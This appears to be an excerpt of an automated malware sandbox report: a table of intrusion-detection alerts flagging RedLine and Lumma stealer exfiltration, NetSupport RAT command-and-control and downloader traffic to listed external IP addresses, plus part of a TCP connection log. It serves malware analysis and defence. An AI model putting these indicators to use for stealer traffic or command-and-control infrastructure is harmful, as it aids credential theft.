                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350278812046045 12/06/23-14:36:08.769868TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5027881192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350253812046045 12/06/23-14:35:52.149838TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5025381192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350351812046045 12/06/23-14:36:59.140117TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5035181192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350367812046045 12/06/23-14:37:10.788474TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5036781192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350287812046045 12/06/23-14:36:15.015230TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5028781192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350324812046045 12/06/23-14:36:39.669230TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5032481192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350315812046045 12/06/23-14:36:33.722404TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5031581192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350306812046045 12/06/23-14:36:27.603943TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5030681192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350280812046045 12/06/23-14:36:10.078872TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5028081192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350269812046045 12/06/23-14:36:02.831888TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5026981192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350323812046045 12/06/23-14:36:38.995481TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5032381192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350262812046045 12/06/23-14:35:58.204295TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5026281192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350297812046045 12/06/23-14:36:21.680969TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5029781192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350300812046045 12/06/23-14:36:23.660225TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5030081192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350358812046045 12/06/23-14:37:04.890944TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5035881192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350357812046045 12/06/23-14:37:03.144834TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5035781192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.5157.230.96.3250126802834928 12/06/23-14:33:41.532380TCP2834928ETPRO MALWARE Observed Suspicious UA (AdvancedInstaller)5012680192.168.2.5157.230.96.32
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350316812046045 12/06/23-14:36:34.370818TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5031681192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350370812046045 12/06/23-14:37:12.776192TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5037081192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350305812046045 12/06/23-14:36:26.947206TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5030581192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350263812046045 12/06/23-14:35:58.892261TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5026381192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350334812046045 12/06/23-14:36:47.909549TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5033481192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350268812046045 12/06/23-14:36:02.185549TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5026881192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350352812046045 12/06/23-14:36:59.810575TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5035281192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350245812046045 12/06/23-14:35:46.787174TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5024581192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350286812046045 12/06/23-14:36:14.346391TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5028681192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350264812046045 12/06/23-14:35:59.558216TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5026481192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350368812046045 12/06/23-14:37:11.445584TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5036881192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350270812046045 12/06/23-14:36:03.477604TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5027081192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350261812046045 12/06/23-14:35:57.535196TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5026181192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350301812046045 12/06/23-14:36:24.319593TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5030181192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350279812046045 12/06/23-14:36:09.427188TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5027981192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350350812046045 12/06/23-14:36:58.477999TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5035081192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.5159.223.29.4049730802839343 12/06/23-14:33:21.497166TCP2839343ETPRO MALWARE InnoDownloadPlugin User-Agent Observed4973080192.168.2.5159.223.29.40
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350288812046045 12/06/23-14:36:15.727049TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5028881192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350338812046045 12/06/23-14:36:50.569356TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5033881192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350344812046045 12/06/23-14:36:54.501584TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5034481192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350285812046045 12/06/23-14:36:13.685357TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5028581192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350291812046045 12/06/23-14:36:17.724996TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5029181192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350255812046045 12/06/23-14:35:53.486217TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5025581192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350258812046045 12/06/23-14:35:55.450063TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5025881192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350353812046045 12/06/23-14:37:00.456748TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5035381192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350347812046045 12/06/23-14:36:56.459765TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5034781192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350249812046045 12/06/23-14:35:49.517021TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5024981192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.595.142.47.114971812032827745 12/06/23-14:33:18.908166TCP2827745ETPRO TROJAN NetSupport RAT CnC Activity497181203192.168.2.595.142.47.11
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350314812046045 12/06/23-14:36:33.067223TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5031481192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350349812046045 12/06/23-14:36:57.813215TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5034981192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.5104.21.83.14550196802048094 12/06/23-14:35:05.671865TCP2048094ET TROJAN [ANY.RUN] Win32/Lumma Stealer Exfiltration5019680192.168.2.5104.21.83.145
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350283812046045 12/06/23-14:36:12.083206TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5028381192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.5104.21.83.14550196802048093 12/06/23-14:35:05.393985TCP2048093ET TROJAN [ANY.RUN] Win32/Lumma Stealer Check-In5019680192.168.2.5104.21.83.145
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350320812046045 12/06/23-14:36:37.012244TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5032081192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350355812046045 12/06/23-14:37:01.752652TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5035581192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350308812046045 12/06/23-14:36:28.952581TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5030881192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350266812046045 12/06/23-14:36:00.860284TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5026681192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350294812046045 12/06/23-14:36:19.720749TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5029481192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350272812046045 12/06/23-14:36:04.780598TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5027281192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350325812046045 12/06/23-14:36:40.326068TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5032581192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350361812046045 12/06/23-14:37:06.857535TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5036181192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350331812046045 12/06/23-14:36:44.280145TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5033181192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350366812046045 12/06/23-14:37:10.126303TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5036681192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350277812046045 12/06/23-14:36:08.103794TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5027781192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350319812046045 12/06/23-14:36:36.357919TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5031981192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350299812046045 12/06/23-14:36:22.998701TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5029981192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350293812046045 12/06/23-14:36:19.055677TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5029381192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350336812046045 12/06/23-14:36:49.242148TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5033681192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350327812046045 12/06/23-14:36:41.646083TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5032781192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350284812046045 12/06/23-14:36:12.740748TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5028481192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350247812046045 12/06/23-14:35:48.186162TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5024781192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350275812046045 12/06/23-14:36:06.769942TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5027581192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350345812046045 12/06/23-14:36:55.159061TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5034581192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.537.1.198.25150187802839343 12/06/23-14:35:39.174213TCP2839343ETPRO MALWARE InnoDownloadPlugin User-Agent Observed5018780192.168.2.537.1.198.251
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350309812046045 12/06/23-14:36:29.696042TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5030981192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350250812046045 12/06/23-14:35:50.167908TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5025081192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350312812046045 12/06/23-14:36:31.744103TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5031281192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350303812046045 12/06/23-14:36:25.632684TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5030381192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350318812046045 12/06/23-14:36:35.709561TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5031881192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350321812046045 12/06/23-14:36:37.678957TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5032181192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350330812046045 12/06/23-14:36:43.615057TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5033081192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350251812046045 12/06/23-14:35:50.825474TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5025181192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350311812046045 12/06/23-14:36:31.045970TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5031181192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350257812046045 12/06/23-14:35:54.795722TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5025781192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350340812046045 12/06/23-14:36:51.889892TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5034081192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350274812046045 12/06/23-14:36:06.102370TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5027481192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350346812046045 12/06/23-14:36:55.814799TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5034681192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350363812046045 12/06/23-14:37:08.174720TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5036381192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350298812046045 12/06/23-14:36:22.345639TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5029881192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350364812046045 12/06/23-14:37:08.818539TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5036481192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350317812046045 12/06/23-14:36:35.040401TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5031781192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350322812046045 12/06/23-14:36:38.345066TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5032281192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350328812046045 12/06/23-14:36:42.306155TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5032881192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350256812046045 12/06/23-14:35:54.137806TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5025681192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.5104.21.52.22349705802047660 12/06/23-14:33:00.564607TCP2047660ET MALWARE Win32/TrojanDownloader Variant Activity (GET)4970580192.168.2.5104.21.52.223
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350369812046045 12/06/23-14:37:12.112948TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5036981192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350292812046045 12/06/23-14:36:18.389256TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5029281192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350362812046045 12/06/23-14:37:07.522278TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5036281192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350365812046045 12/06/23-14:37:09.468071TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5036581192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350267812046045 12/06/23-14:36:01.508627TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5026781192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350359812046045 12/06/23-14:37:05.563977TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5035981192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350307812046045 12/06/23-14:36:28.273610TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5030781192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350276812046045 12/06/23-14:36:07.453180TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5027681192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350310812046045 12/06/23-14:36:30.384232TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5031081192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350313812046045 12/06/23-14:36:32.405793TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5031381192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350252812046045 12/06/23-14:35:51.486831TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5025281192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350341812046045 12/06/23-14:36:52.546584TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5034181192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350304812046045 12/06/23-14:36:26.286831TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5030481192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350335812046045 12/06/23-14:36:48.579507TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5033581192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350246812046045 12/06/23-14:35:47.521454TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5024681192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350329812046045 12/06/23-14:36:42.957751TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5032981192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350282812046045 12/06/23-14:36:11.427578TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5028281192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350356812046045 12/06/23-14:37:02.409479TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5035681192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350273812046045 12/06/23-14:36:05.431652TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5027381192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350254812046045 12/06/23-14:35:52.820317TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5025481192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350248812046045 12/06/23-14:35:48.865133TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5024881192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350289812046045 12/06/23-14:36:16.396787TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5028981192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350326812046045 12/06/23-14:36:40.988661TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5032681192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350332812046045 12/06/23-14:36:44.925833TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5033281192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350271812046045 12/06/23-14:36:04.130647TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5027181192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350360812046045 12/06/23-14:37:06.208022TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5036081192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350354812046045 12/06/23-14:37:01.103024TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5035481192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.537.1.198.25150133802839343 12/06/23-14:33:45.067270TCP2839343ETPRO MALWARE InnoDownloadPlugin User-Agent Observed5013380192.168.2.537.1.198.251
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350265812046045 12/06/23-14:36:00.212175TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5026581192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350259812046045 12/06/23-14:35:56.113850TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5025981192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350348812046045 12/06/23-14:36:57.105195TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5034881192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350337812046045 12/06/23-14:36:49.902555TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5033781192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350295812046045 12/06/23-14:36:20.371059TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5029581192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350343812046045 12/06/23-14:36:53.852752TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5034381192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350260812046045 12/06/23-14:35:56.768169TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5026081192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        192.168.2.577.105.136.350302812046045 12/06/23-14:36:24.976708TCP2046045ET TROJAN [ANY.RUN] RedLine Stealer Family Related (MC-NMF Authorization)5030281192.168.2.577.105.136.3
                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:32:53.866353035 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:32:53.866357088 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:32:53.960131884 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:00.469341040 CET4970580192.168.2.5104.21.52.223
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:00.563971996 CET8049705104.21.52.223192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:00.564228058 CET4970580192.168.2.5104.21.52.223
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:00.564606905 CET4970580192.168.2.5104.21.52.223
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:00.658879995 CET8049705104.21.52.223192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:01.209007978 CET8049705104.21.52.223192.168.2.5
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:01.256983995 CET4970580192.168.2.5104.21.52.223
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:01.427227020 CET4970680192.168.2.5104.21.73.195
                                                                                                                                                                                                                                                                        Dec 6, 2023 14:33:01.521477938 CET8049706104.21.73.195192.168.2.5
